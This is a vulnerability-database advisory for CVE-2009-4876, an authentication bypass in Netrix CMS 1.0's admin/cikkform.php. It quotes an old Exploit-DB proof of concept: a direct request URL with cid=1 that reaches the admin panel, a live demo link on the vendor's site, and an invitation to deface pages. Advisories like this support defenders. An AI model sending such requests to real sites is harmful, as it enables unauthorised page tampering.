CVE-2009-4876
medium
CVSS v3: —
CVSS v4 (new): —
VIR risk: 6.0
Description
admin/cikkform.php in Netrix CMS 1.0 allows remote attackers to modify arbitrary pages via a direct request using the cid parameter.
Predictions
Exploit likelihood: 20%
Patch ETA: —
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Netrix CMS 1.0 - Authentication Bypass
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :Netrix CMS 1.0 (Auth Bypass) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] Script site : www.netrix.hu
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
Exploit :
---------
http://www.site.com/path/admin/cikkform.php?cid=1
---------
You are in the control panel
control panel :
-------------
http://www.site.com/path/admin
-------------
Demo live :
-----------
http://cms.netrix.hu/admin/cikkform.php?cid=1
-----------
You can edit anything or put on your index ;)
# milw0rm.com [2009-07-20]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| netrix | netrix_cms | 1.0 | |
References
- http://osvdb.org/56008
- http://secunia.com/advisories/35891
- http://www.exploit-db.com/exploits/9203
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51846
CWEs
CWE-264